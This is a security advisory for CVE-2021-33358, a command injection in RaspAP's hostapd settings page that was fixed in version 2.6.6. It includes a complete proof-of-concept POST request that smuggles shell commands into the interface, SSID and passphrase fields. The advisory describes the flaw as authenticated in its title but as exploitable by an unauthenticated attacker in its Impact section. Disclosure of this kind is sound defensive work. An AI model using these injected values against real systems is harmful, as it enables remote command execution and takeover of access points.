Authenticated Command Injection Vulnerability Discovered In RaspAP: CVE-2021-33358 / CX-2021-4796

Severity

Severity: 9.9 - Critical Severity

Advisory Timeline Summary
RaspAP prior to version 2.6.6 is vulnerable to Authenticated Command Injection.

Product

RaspAP prior to 2.6.6

Impact

An unauthenticated attacker can execute arbitrary OS commands on any RaspAP instance prior tp 2.6.6. This can be chained with a privilege escalation exploit (CVE-2021-33356) to achieve root access.

Steps To Reproduce

  1. After authenticating, send the following POST request to the RaspAP host:
POST /hostapd_conf HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 355
Origin: http://localhost
Authorization: Basic YWRtaW46c2VjcmV0
Connection: close
Referer: http://localhost/hostapd_conf
Cookie: PHPSESSID=j99hb7n50dp4d26no5ccnjhf2o
Upgrade-Insecure-Requests: 1

csrf_token=ce138993d5ecd5d041fb805425ab069d700251a1be50e2ade5d51c5fa084f282&interface=lo;touch%20/tmp/checkinterface;&ssid=%24%28touch+%2Ftmp%2Fcheckssid%29&hw_mode=g&channel=1&wpa=2&wpa_pairwise=CCMP&wpa_passphrase=%24%28touch+%2Ftmp%2Fcheckpass%29&beaconintervalEnable=1&beacon_interval=100&max_num_sta=&country_code=AF&SaveHostAPDSettings=Save+settings

The injectable parameters are “interface”, “ssid” and “wpa_passphrase”.

Expected Result:

The request will write empty files to /tmp/checkinterface, /tmp/checkssid and /tmp/checkpass.

Remediation

This issue was fixed in version 2.6.6 through the commit.

Properties

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

User Interaction: None

Scope: Changed

Confidentiality: High

Integrity: High

Availability: High

Credit

This issue was discovered and reported by Checkmarx Security Researcher Omri Inbar.

Resources

  1. Commit (cae2031)